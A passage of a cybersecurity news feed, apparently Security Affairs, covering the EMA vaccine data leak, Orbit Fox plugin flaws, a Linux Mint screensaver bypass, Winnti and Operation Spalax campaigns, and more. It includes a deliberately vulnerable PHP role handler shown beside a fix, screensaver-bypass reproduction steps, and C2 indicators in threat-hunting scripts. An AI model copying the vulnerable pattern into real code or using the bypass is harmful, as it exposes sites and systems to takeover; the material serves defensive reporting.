After the attack, Pfizer and BioNTech issued a joint statement confirming that some documents related to their COVID-19 submissions had been accessed by the threat actors.

Last week, the European Medicines Agency (EMA) revealed that threat actors had stolen some of the Pfizer/BioNTech COVID-19 vaccine data and leaked it online.

The agency added that the European medicines regulatory network is fully functional and that the cyber attack had no impact on COVID-19 evaluation and approval timelines.

The investigation conducted by the European Medicines Agency showed that the threat actors manipulated emails and documents related to the evaluation of experimental COVID-19 vaccines before leaking them online.

The manipulation of the documents is part of a disinformation campaign aimed at raising doubts about the vaccine and the work of the EMA.

“Some of the correspondence has been manipulated by the perpetrators prior to publication in a way which could undermine trust in vaccines,” the Netherlands-based agency said.

“We have seen that some of the correspondence has been published not in its integrity and original form and, or with, comments or additions by the perpetrators.”

Multiple security firms, such as Cyble and Yarix, have found leaks on underground forums.

“During the assessment of data, our researchers noticed that multiple confidential files, including MoMs, assessment reports, confidential emails, login portal links and images of its internal pages were accessed and leaked.” reported the analysis published by Cyble.  


The experts shared screenshots of the internal email where the portal link was shared, the login page for the portal to access the reports, and images of internal pages.


The documents also include the alleged assessment report of the COVID-19 vaccine along with the summary report of drug release and stability.

Law enforcement authorities are still investigating the security incident.

Pierluigi Paganini

(SecurityAffairs – hacking, EMA)

Critical flaws in Orbit Fox WordPress plugin allows site takeover

Two vulnerabilities in the Orbit Fox WordPress plugin, a privilege-escalation issue and a stored XSS bug, can allow site takeover.

Security experts from Wordfence have discovered two security vulnerabilities in the Orbit Fox WordPress plugin: a privilege-escalation vulnerability and a stored XSS bug that impact over 40,000 installs.

The Orbit Fox plugin allows site administrators to add features such as registration forms and widgets; it has been installed on 400,000+ sites.

The plugin was developed by ThemeIsle and is designed to enhance the Elementor, Beaver Builder, and Gutenberg editors with additional features.

The two vulnerabilities can be exploited by attackers to inject malicious code into websites running the vulnerable version of the plugin and take them over.

“One of these flaws made it possible for attackers with contributor level access or above to escalate their privileges to those of an administrator and potentially take over a WordPress site. The other flaw made it possible for attackers with contributor or author level access to inject potentially malicious JavaScript into posts.” reads the post published by Wordfence. “These types of malicious scripts can be used to redirect visitors to malvertising sites or create new administrative users, amongst many other actions.”

The authenticated privilege-escalation flaw has been rated critical and received a CVSS severity score of 9.9: authenticated attackers with contributor-level access or above can escalate their privileges to administrator and potentially take over a website.

The authenticated stored cross-site scripting (XSS) issue allows attackers with contributor- or author-level access to inject JavaScript into posts. An attacker could exploit this flaw to carry out multiple malicious actions, such as malvertising. The flaw is rated medium severity and received a CVSS score of 6.4.

The Orbit Fox plugin includes a registration widget that can be used to create a registration form with customizable fields when the Elementor or Beaver Builder page builder plugin is in use. Upon creating the registration form, the plugin provides the ability to set a default role to be assigned whenever a user registers through the form.

“Lower-level users like contributors, authors, and editors were not shown the option to set the default user role from the editor. However, we found that they could still modify the default user role by crafting a request with the appropriate parameter,” Wordfence continues. “The plugin provided client-side protection to prevent the role selector from being shown to lower-level users while adding a registration form. Unfortunately, there were no server-side protections or validation to verify that an authorized user was actually setting the default user role in a request.”

Experts pointed out that the lack of server-side validation in Orbit Fox allowed lower-level users to set the default role to administrator, so that they obtained administrator privileges upon successful registration.

“To exploit this flaw, user registration would need to be enabled and the site would need to be running the Elementor or Beaver Builder plugins,” continues Wordfence. “A site with user registration disabled or neither of these plugins installed would not be affected by this vulnerability.”
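As an added illustration of the server-side check described above (hypothetical code, not Orbit Fox’s, ThemeIsle’s or Wordfence’s own), the following shows a registration-form save handler that trusts a browser-supplied role next to a version that validates it on the server. It assumes it runs inside WordPress (where `current_user_can`, `get_editable_roles`, `get_option`, `update_option`, `sanitize_key`, `wp_roles` and `wp_insert_user` are core functions); the function names and the option name are invented.

```php
<?php
// Hypothetical example of the bug class described above: a registration-form
// setting that is only hidden client-side, and the server-side validation that
// was missing. Runs inside WordPress; get_editable_roles() lives in
// wp-admin/includes/user.php, so the handler must be reached through an admin
// or admin-ajax request, as page-builder save actions normally are.

/**
 * BEFORE: the role selector is merely not shown to contributors/authors/editors
 * in the editor UI. Any user who can edit posts can still craft a request with
 * 'default_role' => 'administrator', and it is stored as-is.
 */
function example_save_default_role_vulnerable( array $form_settings ) {
    $role = isset( $form_settings['default_role'] )
        ? $form_settings['default_role']            // trusted verbatim
        : get_option( 'default_role', 'subscriber' );
    update_option( 'example_registration_default_role', $role );
    return $role;
}

/**
 * AFTER: decide on the server which role is acceptable.
 *  1. Only users who may assign roles (the 'promote_users' capability) can
 *     change the registration default at all.
 *  2. The requested role must be one the current user is allowed to assign;
 *     get_editable_roles() already applies WordPress' capability filters.
 *  3. The registration default is never allowed to be 'administrator',
 *     regardless of who asks.
 * Anyone else silently gets the site-wide default (normally 'subscriber').
 */
function example_save_default_role_hardened( array $form_settings ) {
    $site_default = get_option( 'default_role', 'subscriber' );

    if ( ! current_user_can( 'promote_users' ) ) {
        // Contributors, authors and editors land here: the parameter is ignored.
        $role = $site_default;
    } else {
        $requested = isset( $form_settings['default_role'] )
            ? sanitize_key( $form_settings['default_role'] )
            : $site_default;
        $allowed = array_keys( get_editable_roles() );
        if ( 'administrator' === $requested || ! in_array( $requested, $allowed, true ) ) {
            $role = $site_default;
        } else {
            $role = $requested;
        }
    }

    update_option( 'example_registration_default_role', $role );
    return $role;
}

/**
 * At registration time the stored default is validated again before the user
 * is created, so a value poisoned earlier (or by another plugin) cannot be
 * replayed into wp_insert_user().
 */
function example_register_user( string $login, string $email, string $password ) {
    $role = get_option(
        'example_registration_default_role',
        get_option( 'default_role', 'subscriber' )
    );
    if ( 'administrator' === $role || ! wp_roles()->is_role( $role ) ) {
        $role = 'subscriber';
    }
    return wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $password,
        'role'       => $role,
    ) );
}
```

The two checks together close both halves of the issue described by Wordfence: the role can no longer be set by users who should not see the selector, and even a stored administrator default is refused when the account is actually created.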

The stored XSS vulnerability allowed lower-level users to add malicious JavaScript to posts that would execute in the browser whenever a user navigated to the page.

The two vulnerabilities have been addressed with the release of version 2.10.3.

Vulnerabilities in WordPress plugins are very dangerous and could allow attackers to carry out attacks on a large scale. In December, the development team behind the Contact Form 7 WordPress plugin disclosed an unrestricted file upload vulnerability; the plugin has over 5 million active installs. The issue could be exploited to upload a file that can be executed as a script on the underlying server.

In November, threat actors were observed actively exploiting a zero-day vulnerability in the popular Easy WP SMTP WordPress plugin, installed on more than 500,000 sites.

In the same period, hackers were actively exploiting a critical remote code execution vulnerability in the File Manager plugin; over 300,000 WordPress sites were potentially exposed at the time of the discovery.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

Security Affairs newsletter Round 297

A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box.

It is time to re-evaluate Cyber-defence solutions
New Zealand central bank hit by a cyber attack
TeamTNT botnet now steals Docker API and AWS credentials
Connecting the dots between SolarWinds and Russia-linked Turla APT
Experts found gained access to the Git Repositories of the United Nations
Russian hacker Andrei Tyurin sentenced to 12 years in prison
Source code for malware that targets Qiui Cellmate device was leaked online
Ubiquiti discloses a data breach
Bitdefender releases free decrypter for Darkside ransomware
EMA: Some of Pfizer/BioNTech COVID-19 vaccine data was leaked online
Police took down DarkMarket, the world’s largest darknet marketplace
Sophisticated hacking campaign uses Windows and Android zero-days
Sunspot, the third malware involved in the SolarWinds supply chain attack
Attackers targeted Accellion FTA in New Zealand Central Bank attack
Data collection cheat sheet: how Parler, Twitter, Facebook, MeWe’s data policies compare
Rogue Android RAT emerges from the darkweb
CAPCOM: 390,000 people impacted in the recent ransomware Attack
CISA warns of recent successful cyberattacks against cloud service accounts
Cisco addresses a High-severity flaw in CMX Software
Classiscam expands to Europe: Russian-speaking scammers lure Europeans to pages mimicking classifieds
Expert discovered a DoS vulnerability in F5 BIG-IP systems
Operation Spalax, an ongoing malware campaign targeting Colombian entities
Cisco says its RV routers will no longer receive updates
Expert launched Malvuln, a project to report flaws in malware
Signal is down for multiple users worldwide
Winnti APT continues to target game developers in Russia and abroad
Joker’s Stash, the largest carding site, is shutting down
Siemens fixed tens of flaws in Siemens Digital Industries Software products
Two kids found a screensaver bypass in Linux Mint

Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)

Two kids found a screensaver bypass in Linux Mint

The development team behind the Linux Mint distro has fixed a security flaw that could have allowed users to bypass the OS screensaver.

The maintainers of the Linux Mint project have addressed a security bug that could have allowed attackers to bypass the OS screensaver.

The curious aspect of this vulnerability is its discovery: it was found by two children who were playing on their dad’s computer.

The process is simple: the screensaver lock can be bypassed by crashing the screensaver via the virtual keyboard, which unlocks the desktop.

To reproduce the bypass on a locked system, click on the virtual keyboard, then type on the real keyboard while also typing on the virtual keyboard, pressing as many keys as possible at the same time.

“A few weeks ago, my kids wanted to hack my linux desktop, so they typed and clicked everywhere, while I was standing behind them looking at them play… when the screensaver core dumped and they actually hacked their way in! wow, those little hackers…” states a bug report on GitHub.

“I thought it was a unique incident, but they managed to do it a second time. So I’d consider this issue… reproducible… by kids. I tried to recreate the crash on my own with no success, maybe because it required more than 4 little hands typing and using the mouse on the virtual keyboard. Maybe not the best bug report, but I’ve seen the screenlock crash twice already with my own eyes, so it’s pretty real. One last thing, after the desktop is unlocked, I can’t re-lock it again, the screensaver process is pretty dead and requires me to open a shell and run ‘cinnamon-screensaver’ manually to get it working.”

Linux Mint lead developer Clement Lefebvre confirmed that the bug resides in libcaribou, the on-screen keyboard (OSK) component of the Cinnamon desktop environment used by Linux Mint.

“We’ll most likely patch libcaribou here” wrote Lefebvre. “We have two different issues:

  • In all versions of Cinnamon, the on-screen keyboard (launched from the menu) runs within the Cinnamon process and uses libcaribou. Pressing ē crashes Cinnamon.
  • In versions of Cinnamon 4.2 and higher, there’s a libcaribou OSK in the screensaver. Pressing ē there crashes the screensaver.”

The vulnerability is triggered when users press the “ē” key on the on-screen keyboard, which crashes the Cinnamon desktop process. If the on-screen keyboard is opened from the screensaver, the bug crashes the screensaver instead, allowing users to access the desktop.

The issue was introduced in Linux Mint with the October Xorg update that fixed the CVE-2020-25712 heap-buffer overflow. The bug affects all distributions running Cinnamon 4.2+ and any software using libcaribou.

The vulnerability was addressed with the release of a patch for Mint 19.x, Mint 20.x and LMDE 4.

Pierluigi Paganini

(SecurityAffairs – hacking, Linux Mint)

Siemens fixed tens of flaws in Siemens Digital Industries Software products

Siemens has addressed tens of vulnerabilities in Siemens Digital Industries Software products that can allow arbitrary code execution.

Siemens has addressed 18 vulnerabilities affecting some products of Siemens Digital Industries Software, which provides product lifecycle management (PLM) solutions.

The vulnerabilities affect Siemens JT2Go, a viewing tool for 3D JT data (an ISO-standardized 3D data format), and the Teamcenter Visualization solution. JT2Go allows customers to view JT, PDF, Solid Edge and PLM XML files with associated JT, VFZ, CGM, and TIF data. Teamcenter Visualization provides a comprehensive family of visualization solutions to access documents, 2D drawings and 3D models in a single environment.

“JT2Go and Teamcenter Visualization are affected by multiple vulnerabilities that could lead to arbitrary code execution or data extraction on the target host system. Siemens has released updates for both affected products and recommends to update to the latest versions.” states the advisory published by the vendor.

The company recommends limiting the opening of untrusted files on systems where JT2Go or Teamcenter Visualization is installed to mitigate the risk of attacks exploiting these issues. It also suggests applying a defense-in-depth concept to reduce the probability that untrusted code is run on the system.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also published an advisory related to these security flaws.

According to CISA, the addressed flaws include Type Confusion, Improper Restriction of XML External Entity Reference, Out-of-bounds Write, Heap-based Buffer Overflow, Stack-based Buffer Overflow, Untrusted Pointer Dereference, and Out-of-bounds Read.

The following products are affected by the vulnerabilities addressed by Siemens:

  • JT2Go: All versions prior to v13.1.0
  • JT2Go: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991
  • Teamcenter Visualization: All versions prior to V13.1.0
  • Teamcenter Visualization: Version 13.1.0 only affected by CVE-2020-26989, CVE-2020-26990, CVE-2020-26991

Several vulnerabilities addressed by the vendor received a CVSS v3 base score of 7.8, including:

The flaws were reported by two researchers through Trend Micro’s Zero Day Initiative (ZDI) and the U.S. CISA.

Siemens also addressed six vulnerabilities in its Solid Edge solution, which provides software tools for 3D design, simulation and manufacturing. The flaws could lead to arbitrary code execution and information disclosure.

“Solid Edge is affected by multiple vulnerabilities that could allow arbitrary code execution on an affected system. Siemens has released an update for Solid Edge and recommends to update to the latest version.” reads the advisory.

Pierluigi Paganini

(SecurityAffairs – hacking, Siemens)

Joker’s Stash, the largest carding site, is shutting down

Joker’s Stash to shut down on February 15, 2021.

Joker’s Stash, the largest carding marketplace online, announced that its operations will shut down on February 15, 2021.

The administrator announced the decision via messages posted on various cybercrime forums.

[Image: Joker’s Stash official closing message; image source: Flashpoint]

Joker’s Stash is one of the longest-running carding websites; it was launched in October 2014 and is very popular in the cybercrime underground because of the freshness and validity of its cards. The administrators always claimed the exclusivity of their offer, which they said is based on “self-hacked bases.”

In December, Joker’s Stash was shut down as a result of a coordinated operation conducted by the FBI and Interpol.


At the time, the authorities seized only some of the servers used by the carding portal; the Joker’s Stash site hosted on the Tor network was not affected by the police operation.

The seized sites were jstash.bazar, jstash.lib, jstash.emc, and jstash.coin, all of which are accessible via blockchain DNS.

Joker’s Stash admins said in a message published on a hacking forum that law enforcement had only seized the servers hosting the above domains, which were used only to redirect visitors to the actual website.

The seizure carried out by law enforcement in December had an impact on the portal’s reputation; some users were also claiming that the quality of the services offered by Joker’s Stash was decreasing.

“Throughout 2020, the typically active administrator JokerStash had several gaps in communications. JokerStash claimed that they were hospitalized due to a coronavirus infection. The decreasing number of large fresh bases also questioned their ability to source new card data.” reported FlashPoint.

The closure of the card shop represents a major blow to carding activity in the underground market.

The success of the recent operations might have pushed the administrators to exit their operations.

Pierluigi Paganini

(SecurityAffairs – hacking, carding)

Expert launched Malvuln, a project to report flaws in malware

The researcher John Page launched, the first website exclusively dedicated to the research of security flaws in malware code.

The security expert John Page (aka hyp3rlinx) launched, the first platform exclusively dedicated to the research of security flaws in malware code.

The news was first reported by SecurityWeek; the researcher explained that Malvuln is the first website dedicated to the research and analysis of vulnerabilities in malware samples.

“ is the first website exclusively dedicated to the research of security vulnerabilities within Malware itself.” wrote the expert. “There are many websites already offering information about Malware like Hashes, IOC, Reversing etc. However, none dedicated to research and analysis of vulnerabilities within Malware samples… until now. Long Live MALVULN.”

Sharing knowledge of vulnerabilities affecting malware could allow incident response teams to neutralize the threat in case of infection, but it could also help malware authors (vxers) fix them and improve their malware. For this reason, it is likely that Page will regulate the vulnerability disclosure process in the future.

This is a great initiative that deserves support; anyone can get in contact with the expert via Twitter (@malvuln) or email (malvuln13[at]

Currently, Page is the sole contributor to the Malvuln service, but he could start accepting third-party contributions in the future.

Clearly, the initiative was born for educational and research purposes only.

At the time of writing, the site already includes 26 entries related to remotely exploitable buffer overflow flaws and privilege escalation issues. Most of the buffer overflow vulnerabilities could be exploited for remote code execution.

For each flaw reported on the website, the record includes information such as the name of the malware, its MD5 hash, the type of vulnerability, a description of the vulnerability, dropped files, a memory dump, and proof-of-concept (PoC) exploit code.

Pierluigi Paganini

(SecurityAffairs – hacking, Golang-based worm)

Winnti APT continues to target game developers in Russia and abroad

A Chinese threat actor targeted organizations in Russia and Hong Kong with a previously undocumented backdoor, experts warn.

Cybersecurity researchers from Positive Technologies have uncovered a series of attacks conducted by a Chinese threat actor that aimed at organizations in Russia and Hong Kong. Experts attribute the attacks to the China-linked Winnti APT group (aka APT41) and reported that the attackers used a previously undocumented backdoor in the attacks.

The Winnti group was first spotted by Kaspersky in 2013, but according to the researchers the gang has been active since 2007.

The experts believe that the Winnti umbrella covers several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, Group 72, Blackfly, APT41, and ShadowPad.

The APT group targeted organizations in various industries, including the aviation, gaming, pharmaceuticals, technology, telecoms, and software development industries.

The recent attacks documented by Positive Technologies were first spotted on May 12, 2020, when the experts detected several samples of new malware that were initially, and incorrectly, attributed to the Higaisa threat actor. Investigating the attack, the experts discovered a number of new malware samples used by the attackers, including various droppers, loaders, and injectors. The attackers also used the Crosswalk, ShadowPad, and PlugX backdoors, and the researchers noticed a sample of a previously undocumented backdoor that they dubbed FunnySwitch.

In the first attack, the threat actors used LNK shortcuts to extract and run the malware payload, while in the second attack detected on May 30, the threat actor used a malicious archive (CV_Colliers.rar) containing the shortcuts to two bait PDF documents with a CV and IELTS certificate.

The LNK files contain links to target pages hosted on Zeplin, a legitimate collaboration service for designers and developers.

The payload consists of two files, the svchast.exe that acts as a simple local shellcode loader, and ‘3t54dE3r.tmp’ that is the shellcode containing the main payload (the Crosswalk malware).

Crosswalk was first spotted by FireEye researchers in 2017 and was included in their analysis of the activities associated with the APT41 (Winnti) group. The malware is a modular backdoor that implements system reconnaissance capabilities and is able to deliver additional payloads.

Experts also discovered a significant overlap of the network infrastructure with the APT41’s infrastructure.

“The network infrastructure of the samples overlaps with previously known APT41 infrastructure: at the IP address of one of the C2 servers, we find an SSL certificate with SHA-1 value of b8cff709950cfa86665363d9553532db9922265c, which is also found at IP address 67.229.97[.]229, referenced in a 2018 CrowdStrike report. Going further, we can find domains from a Kaspersky report written in 2013.” reads the report published by Positive Technologies. “All this leads us to conclude that these LNK file attacks were performed by Winnti (APT41), which “borrowed” this shortcut technique from Higaisa.”

Winnti infrastructure
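The attribution step described above is an infrastructure pivot: a TLS certificate fingerprint seen on a new C2 address is also found on an address from earlier reporting, which ties the new samples to old infrastructure. The following Python is an added example of that pivot, not Positive Technologies' tooling. The certificate SHA-1 and the 67.229.97[.]229 address are the ones quoted on this page; every other indicator (the 203.0.113.0/24 and 198.51.100.0/24 addresses, the example.test domains) is constructed for illustration.

```python
"""Infrastructure pivoting over shared TLS certificate fingerprints and
domain-to-IP resolutions (added example; observations are constructed)."""
from collections import deque

# Constructed passive-DNS / passive-SSL style observations: (indicator, indicator, relation).
# Indicator kinds: "cert:<sha1>", "ip:<address>", "domain:<name>".
OBSERVATIONS = [
    ("cert:b8cff709950cfa86665363d9553532db9922265c", "ip:67.229.97[.]229", "served_by"),  # from the page
    ("cert:b8cff709950cfa86665363d9553532db9922265c", "ip:203.0.113.10", "served_by"),    # constructed new C2
    ("domain:update.example-c2.test", "ip:203.0.113.10", "resolves_to"),                  # constructed
    ("domain:old-c2.example.test", "ip:67.229.97[.]229", "resolves_to"),                  # constructed
    ("domain:unrelated.example.test", "ip:198.51.100.7", "resolves_to"),                  # constructed, no link
]

# Indicators already attributed to the actor (assumption: seeded from prior reporting).
KNOWN_BAD = {"ip:67.229.97[.]229"}


def build_graph(observations):
    """Undirected adjacency map; the relation label is kept only for the reader."""
    graph = {}
    for a, b, _relation in observations:
        graph.setdefault(a, set()).add(b)
        graph.setdefault(b, set()).add(a)
    return graph


def pivot(graph, start, max_hops=3):
    """Breadth-first walk from one indicator; returns {indicator: shortest path from start}."""
    paths = {start: [start]}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if len(paths[node]) - 1 >= max_hops:   # do not expand beyond the hop budget
            continue
        for neighbour in sorted(graph.get(node, ())):
            if neighbour not in paths:
                paths[neighbour] = paths[node] + [neighbour]
                queue.append(neighbour)
    return paths


def link_to_known(graph, indicator, known_bad, max_hops=3):
    """Shortest path from a new indicator to any known-bad indicator, or None."""
    paths = pivot(graph, indicator, max_hops)
    hits = [paths[k] for k in sorted(known_bad) if k in paths]
    return min(hits, key=len) if hits else None


def pivot_report(observations=OBSERVATIONS, known_bad=KNOWN_BAD, max_hops=3):
    """For every domain in the data set, the path (if any) tying it to known infrastructure."""
    graph = build_graph(observations)
    return {
        node: link_to_known(graph, node, known_bad, max_hops)
        for node in sorted(graph)
        if node.startswith("domain:")
    }


if __name__ == "__main__":
    for domain, path in pivot_report().items():
        print(domain, "->", " -> ".join(path) if path else "no link within 3 hops")
```

One reused certificate is enough to chain a brand-new domain to infrastructure reported years earlier, which is why operators who recycle certificates across servers keep getting linked. The hop budget matters in practice: nodes that connect to thousands of hosts (shared-hosting IPs, CDN certificates) will link everything to everything, so a real pivot should also discard or down-weight such high-degree nodes before trusting a path.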

The Winnti group focuses on the computer game industry: it has targeted game developers in the past, and it recently hit Russian companies in the same sector. The targets of the recent attacks include Battlestate Games, a Unity3D game developer from St. Petersburg.

In June, the researchers detected an active HttpFileServer (HFS) on one of the active C2 servers. It contained an email icon, a screenshot from a game with Russian text, a screenshot of a game development company’s website, and a screenshot of the Microsoft page describing vulnerability CVE-2020-0796. The files were used two months later, on August 20, 2020, in attacks that also leveraged a self-contained loader for Cobalt Strike Beacon PL shellcode.

The discovery led the experts to believe that they had found traces of the preparation for, and subsequent successful execution of, an attack on Battlestate Games.

“Winnti continues to pursue game developers and publishers in Russia and elsewhere. Small studios tend to neglect information security, making them a tempting target. Attacks on software developers are especially dangerous for the risk they pose to end users, as already happened in the well-known cases of CCleaner and ASUS. By ensuring timely detection and investigation of breaches, companies can avoid becoming victims of such a scenario.” concludes the report.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Winnti APT)

The post Winnti APT continues to target game developers in Russia and abroad appeared first on Security Affairs.

Expert discovered a DoS vulnerability in F5 BIG-IP systems

A security researcher discovered a flaw in the F5 BIG-IP product that can be exploited to conduct denial-of-service (DoS) attacks.

The security expert Nikita Abramov from Positive Technologies discovered a DoS vulnerability, tracked as CVE-2020-27716, that affects certain versions of F5 BIG-IP Access Policy Manager (APM).

The F5 BIG-IP Access Policy Manager is a secure, flexible, high-performance access management proxy solution that delivers unified global access control for your users, devices, applications, and application programming interfaces (APIs).

The vulnerability resides in the Traffic Management Microkernel (TMM) component which processes all load-balanced traffic on BIG-IP devices.

“When a BIG-IP APM virtual server processes traffic of an undisclosed nature, the Traffic Management Microkernel (TMM) stops responding and restarts. (CVE-2020-27716)” reads the advisory published by F5. “Traffic processing is disrupted while TMM restarts. If the affected BIG-IP system is configured as part of a device group, the system triggers a failover to the peer device.”

An attacker could trigger the flaw simply by sending a specially crafted HTTP request to the server hosting the BIG-IP configuration utility; that is enough to take TMM down until it automatically restarts, disrupting traffic processing in the meantime.

“Vulnerabilities like this one are quite commonly found in code. They can occur for different reasons, for example unconsciously neglected by developers or due to insufficient additional checks being carried out. I discovered this vulnerability during binary analysis. Flaws like this one can be detected using non-standard requests and by analyzing logic and logical inconsistencies.” Nikita Abramov, researcher at Positive Technologies, explains.

The flaw impacts versions 14.x and 15.x, the vendor already released security updates that address it.

In June, F5 Networks addressed another flaw, tracked as CVE-2020-5902, which resides in undisclosed pages of the Traffic Management User Interface (TMUI) of the BIG-IP product.

The vulnerability could be exploited by attackers to gain access to the TMUI component, execute arbitrary system commands, disable services, execute arbitrary Java code, create or delete files, and potentially take over the BIG-IP device.

The CVE-2020-5902 vulnerability received the maximum CVSS score of 10, reflecting that it can be exploited remotely without authentication and gives an attacker full control of the device. It could be exploited by sending a specially crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) configuration utility for BIG-IP.

Several proof-of-concept (PoC) exploits were released immediately after the public disclosure of the flaw, some of them very easy to use.

A few days after the disclosure, threat actors started exploiting the vulnerability in attacks in the wild, using CVE-2020-5902 to obtain passwords, create web shells, and infect systems with various malware.

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, F5 BIG-IP)

The post Expert discovered a DoS vulnerability in F5 BIG-IP systems appeared first on Security Affairs.

Operation Spalax, an ongoing malware campaign targeting Colombian entities

Security experts from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian government institutions and private companies.

Malware researchers from ESET uncovered an ongoing surveillance campaign, dubbed Operation Spalax, against Colombian entities exclusively.

The attacks aimed at government institutions and private companies, most of them in the energy and metallurgical sectors.  The campaign has been active at least since 2020, the attackers leverage remote access trojans to spy on their victims. 

The attacks share some similarities with other campaigns targeting Colombian entities, in particular a campaign detailed in February 2019, by QiAnXin. The operations described by QiAnXin are attributed to an APT group active since at least April 2018.

ESET highlighted the following similarities:

  • We saw a malicious sample included in IoCs of QiAnXin’s report and a sample from the new campaign in the same government organization. These files have fewer than a dozen sightings each.
  • Some of the phishing emails from the current campaign were sent from IP addresses corresponding to a range that belongs to Powerhouse Management, a VPN service. The same IP address range was used for emails sent in the earlier campaign.
  • The phishing emails have similar topics and pretend to come from some of the same entities – for example, the Office of the Attorney General (Fiscalia General de la Nacion) or the National Directorate of Taxes and Customs (DIAN).
  • Some of the C&C servers in Operation Spalax use and subdomains, along with IP addresses that belong to Powerhouse Management. This also happened in the earlier campaign.

However, experts found differences in the attachments used in the phishing emails, in the remote access trojans (RATs) deployed, and in the operators’ C&C infrastructure.

The attacks start with phishing messages that lead to the download of RAR archives hosted on OneDrive or MediaFire containing a malicious executable.

“We’ve found a variety of packers used for these executables, but their purpose is always to have a remote access trojan running on the victimized computer, usually by decrypting the payload and injecting it into legitimate processes.” continues the report. “We have seen the attackers use three different RATs: Remcos, njRAT and AsyncRAT.”

Operation Spalax

The phishing messages used a wide range of topics as lures, such as notifications of driving infractions, summons to attend court hearings, and orders to take mandatory COVID-19 tests.

ESET also documented the use of heavily obfuscated AutoIt droppers; in this scenario the first-stage malware performs the injection and execution of the payload. The dropper uses two shellcodes contained in the compiled AutoIt script: the first decrypts the payload and the second injects it into another process.

The trojans used in Operation Spalax implement several capabilities to spy on targets, such as keylogging, screen capture, clipboard hijacking, exfiltration of files, and the ability to download and execute other payloads.

ESET pointed out that the attackers rely on a large C2 infrastructure: the experts observed at least 24 different IP addresses in use in the second half of 2020 alone. The attackers probably compromised devices to use them as proxies for their C2 servers. The threat actors also used dynamic DNS services to manage a pool of 70 different domain names (registering new ones on a regular basis) that are dynamically reassigned to IP addresses.
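The infrastructure pattern described above (a pool of dynamic-DNS names whose answers rotate over a shared set of addresses) is visible in ordinary resolver logs. The following Python is an added hunting example, not ESET's tooling; the log lines, the ddns-example.test names and the RFC 5737 addresses are constructed, and the thresholds are assumptions a hunter would tune to their own environment.

```python
"""Flag domains whose resolutions churn across many IPs that are shared with
other domains, the shape of a rotating dynamic-DNS C2 pool (added example;
log lines below are constructed)."""
from collections import defaultdict
from datetime import datetime

# Constructed resolver log: "<iso timestamp> <queried domain> <answer ip>"
LOG = """\
2020-07-01T08:00:00 mail-update.ddns-example.test 203.0.113.5
2020-07-01T20:00:00 mail-update.ddns-example.test 198.51.100.9
2020-07-02T09:00:00 mail-update.ddns-example.test 192.0.2.44
2020-07-02T21:00:00 mail-update.ddns-example.test 203.0.113.77
2020-07-01T08:10:00 factura-dian.ddns-example.test 203.0.113.5
2020-07-02T09:10:00 factura-dian.ddns-example.test 192.0.2.44
2020-07-03T09:10:00 factura-dian.ddns-example.test 198.51.100.9
2020-07-01T09:00:00 www.example-corp.test 192.0.2.10
2020-07-02T09:00:00 www.example-corp.test 192.0.2.10
2020-07-03T09:00:00 www.example-corp.test 192.0.2.10
2020-07-01T12:00:00 cdn.example-corp.test 192.0.2.20
2020-07-03T12:00:00 cdn.example-corp.test 192.0.2.21
"""


def parse_log(text):
    """Parse the constructed log format into (timestamp, domain, ip) tuples."""
    records = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, domain, ip = line.split()
        records.append((datetime.fromisoformat(ts), domain.lower(), ip))
    return records


def churn_profile(records):
    """Per domain: distinct answer IPs, IPs per observed day, and how many
    other domains share its busiest IP."""
    domain_ips = defaultdict(set)
    ip_domains = defaultdict(set)
    first, last = {}, {}
    for ts, domain, ip in records:
        domain_ips[domain].add(ip)
        ip_domains[ip].add(domain)
        first[domain] = min(first.get(domain, ts), ts)
        last[domain] = max(last.get(domain, ts), ts)

    profile = {}
    for domain, ips in domain_ips.items():
        # Observation window in days, floored at one hour so a single sighting does not divide by zero.
        days = max((last[domain] - first[domain]).total_seconds() / 86400, 1 / 24)
        profile[domain] = {
            "distinct_ips": len(ips),
            "ips_per_day": len(ips) / days,
            "max_domains_sharing_ip": max(len(ip_domains[ip]) for ip in ips),
        }
    return profile


def flag_rotating(records, min_ips=3, min_ips_per_day=1.0, min_sharing=2):
    """Domains that rotate through at least min_ips addresses and either rotate
    quickly or share addresses with other domains (thresholds are assumptions)."""
    flagged = []
    for domain, p in churn_profile(records).items():
        if p["distinct_ips"] < min_ips:
            continue
        if p["ips_per_day"] >= min_ips_per_day or p["max_domains_sharing_ip"] >= min_sharing:
            flagged.append(domain)
    return sorted(flagged)


if __name__ == "__main__":
    for domain in flag_rotating(parse_log(LOG)):
        print("rotating:", domain)
```

Legitimate round-robin and CDN names also answer with many addresses, which is why the check requires churn *and* sharing rather than a raw IP count; in a real deployment the candidate list is then joined against a list of dynamic-DNS provider zones and against the first-seen date of each name, both of which this example leaves out.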

“Targeted malware attacks against Colombian entities have been scaled up since the campaigns that were described last year,” ESET concludes. “The landscape has changed from a campaign that had a handful of C2 servers and domain names to a campaign with very large and fast-changing infrastructure with hundreds of domain names used since 2019.”

If you want to receive the weekly Security Affairs Newsletter for free subscribe here.

Pierluigi Paganini

(SecurityAffairs – hacking, Operation Spalax)

The post Operation Spalax, an ongoing malware campaign targeting Colombian entities appeared first on Security Affairs.

CAPCOM: 390,000 people impacted in the recent ransomware Attack

Capcom revealed that the recent ransomware attack has potentially impacted 390,000 people, an increase of approximately 40,000 people from the previous report.

In November, Japanese game developer Capcom admitted to having suffered a cyberattack that impacted its business operations.

The company has developed multiple multi-million-selling game franchises, including Street Fighter, Mega Man, Darkstalkers, Resident Evil, Devil May Cry, Onimusha, Dino Crisis, Dead Rising, Sengoku Basara, Ghosts ‘n Goblins, Monster Hunter, Breath of Fire, and Ace Attorney as well as games based on Disney animated properties.

